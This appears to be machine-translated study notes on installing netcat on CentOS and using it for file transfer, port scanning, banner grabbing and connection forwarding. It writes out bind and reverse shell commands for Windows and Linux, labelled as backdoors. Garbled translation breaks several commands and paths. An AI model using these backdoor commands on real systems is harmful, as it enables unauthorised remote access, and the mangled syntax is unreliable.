centos7 nc

centos7 download nc:
wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz

Extracting tar -zxvf netcat-0.7.1.tar.gz

cd /usr/local

mv netcat-0.7.1 netcat

cd /usr/local/netcat

./configure

Compile make

Install make install

Configure vim / etc / profile

Add the following:

*# set netcat path

export NETCAT_HOME=/opt/netcat

export PATH= $PATH:$NETCAT_HOME/bin

Save, exit, and configuration to take effect:

source /etc/profile

test

nc -help success

---

base64 conversion
in the terminal and input the desired value input base64 converting
base64
dangtianpeng
after press Enter to obtain ctrl + D

Based tcp / ip protocol (c / s Model)

The server to transmit data to the client

Forwarding information:
Creating a server-side method:
nc the -l -p localPort
nc the -l -p 333 (server ip: 1.1.1.1)

创建一个客户端方法(连接服务端)
	nc [remote_addr] [remoteport]
	nc -nv 1.1.1.1 333

Returns shell of
creating a server method:
nc the -l -p [localPort] -e cmd.exe

创建一个客户端方法(连接服务器端)
	nc [remote_addr][remoteport]

Nc data transmission, use of standard input and output streams, you can directly use the command line operation.

Use file transfer method:
to create a server-side method: (a server receives a file)
NC -l -p [localPort]> outfile.txt
NC 333 -l -p> outfile.txt
create a client (file transfer)
NC [REMOTE_ADDR ] [remoteport] </root/Desktop/flag.txt

If at this time the server was not ready to connect, and the client has to use nc to connect,
then the client will wait forever, knowing that connect the server, resulting in a kind of "suspended animation" state
solution: set the wait time
nc -w3 [ip] [port] set the wait time is 3 seconds, 3 seconds later, the client close the connection

netcat information detection

1. Target network scanning
2. Simple detection of a target port
3. The service banner goals crawl

Port scan using
NC -v -n the -Z -W1 [target_ip] [start_target_port-stop_target_port]
-v detailed representation of the error output
-n not target machine DNS resolution
-z zero I / O mode, dedicated to the port scan, represents IP data sent by the target table does not contain any payload,
speed can be accelerated so doing scan
-w1 timeout of 1 second

banner抓取
echo " " | nc -v -n -w1 [target_ip][start_target_port-stop_target_port]

Acquisition target commands execute permissions

window established back door method:

1. Monitor type back door
   nc -l -p 4444 -e cmd.exe
2. Backdoor connection type
   nc [remote_ip] [remote_port] -e cmd.exe

The method of establishing linux backdoor
1. backdoor monitor type:
NC -l -p 4444 -e / bin / the bash
2. backdoor connection type
nc [remote_ip] [remote_port] -e / bin / bash

Command parameters

View -h parameter command
from the command window, run in the background -d
execute a program, established back door -e
set the gateway, used in the breakthrough limit -G network
routing hops -g
set up each row of data interval -i
set netcat in a listening state waiting for connection -l
set netcat in listening state waiting for a connection, when the client opens, the server still returns to the wait state -L
set netcat only identify ip address, DNS resolution -n no longer
set the transfer hexadecimal -o data
set local listening port number -p
provided netcat -r randomized port number
provided -s netcat source address
reply request packet -t telnet
provided using netcat -u UDP mode (tcp netcat default mode)
displays -v error message
provided connected to the timeout in seconds -w
set the scan mode, data representing the transmitted packet does not contain payload -z

Connection forwarding
is to break the connection limit in certain special circumstances, to deal with some special cases
echo nc [target] [Port]> delay.bat
nc the -l -p [localPort] -e delay.bat
when the client connection to the service when the end, client connections and connection to the target server via the port forwarding function to achieve a connection. ()